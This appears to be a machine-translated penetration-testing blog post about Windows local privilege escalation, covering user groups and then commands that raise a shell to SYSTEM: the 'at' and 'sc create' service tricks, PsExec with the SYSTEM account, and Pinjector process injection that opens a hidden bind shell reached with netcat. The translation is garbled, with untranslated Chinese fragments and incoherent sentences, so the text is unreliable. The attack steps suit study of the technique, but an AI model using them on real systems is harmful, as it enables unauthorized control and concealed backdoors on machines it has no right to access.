Small white diary 21:kali penetration test Right (i)--local right to raise

Local power-up simply put, the local right to exploit the loophole means that a very low-privileged, restricted user, can be elevated to the system's supremacy of authority. The privilege elevation vulnerability is usually a "secondary" vulnerability, and when a hacker has entered the target machine by some means, it can be used to enter a higher state. But it is not that the vulnerability is not serious, difficult to use, often the vulnerability is more easily exploited, the consequences than the remote vulnerability is more frightening, the vulnerability is actually far more rare than a remote vulnerability, often a Microsoft local right to exploit the price of foreign prices can reach $ millions of. Because the remote vulnerability is very common, a Web site has a problem, it may be tampered with, the introduction of Webshell (a control of the Web site machine control), but at this time the permissions are very low, hackers can not grow Trojans, control the target machine, also can not penetrate the server deeper machine, In the enterprise intranet and this intranet is also the case, usually these network environment has user rights control, even if the Trojan horse, will not cause impact, more can not be spread, but above these in the existence of the machine can be exploited to exploit the loopholes are completely breakthrough. Method of right of Access Portal: http://www.360doc.com/content/06/0614/20/2311_134707.shtml Windows System User Rights Division:

Administrators, Administrators group, by default, users in Administrators have unrestricted full access to the computer/domain. The default permissions assigned to the group allow full control of the entire system. Therefore, only trusted people can become members of this group.
Users: Normal user group, the user of this group cannot make intentional or unintentional changes. As a result, users can run validated applications, but they cannot run most legacy applications. The Users group is the safest group because the default permissions assigned to the group do not allow members to modify the operating system settings or user profile. The Users group provides the safest program run environment. On NTFS-formatted volumes, the default security settings are designed to prohibit members of the group from compromising the integrity of the operating system and installed programs. Users cannot modify system registry settings, operating system files, or program files. Users can shut down the workstation, but cannot shut down the server. Users can create local groups, but can only modify local groups that they create.
System: Has the same or even higher permissions than administrators, but this group does not allow any users to join, when viewing the user group, it will not be displayed, it is the system group.  The permissions that are required for system and system-level services to function properly are given by it.

Linux System User Rights Division

Users: Ordinary Users

Root: Admin Account

Windows system power down "available command line, also available graphical interface"

NET command

#HelpAssistant: Account for Remote Assistance; # #SUPPORT--338945A0: Used to support

NET User Xuan # #可查看当前账号信息

Rights: "Elevated administrator privileges to system permissions"

1. At command "at/?" # #只能在XP与2003的系统上使用

At <time>/interactive cmd # #指定时间, use interactive commands to prevent running in the background

# # #使用taskmgr命令杀死现用户桌面进程, restart, then the entire interface is in the administrator

Use any operation at this time under the system account

2, SC command # #可在win7, win8 use "principle: Create a service (default work under System account)"

SC Create syscmd binpath= "cmd/k start" type= own type= interact "Restart a command line window type for the owning"

Not started by default

Available SC start syscmd at the command line

3.

Windows system has a suite that provides "people who do Windows systems should learn the use of the suite"

https://technet.microsoft.com/en-us/sysinternals/bb545027 reference book: Windows internals

# # #whoami插件, copy to C drive System32, run

# # #PsExec. exe-i-S cmd "-I interactive mode,-S using System account"

4, the injection process to raise the right "equivalent to open a backdoor, very high concealment"

Injecting a process into the system service process

Pinjector.exe Process Injector

http://www.tarasco.org/security/Process_Injector/

# # #pinjector. exe-l# View the available injection process

# # #pinjector. exe-p <PID> cmd <ports>

NC-NV <IP> <ports>

Little white Diary, not to be continued ...

Small white diary 21:kali penetration test Right (i)--local right to raise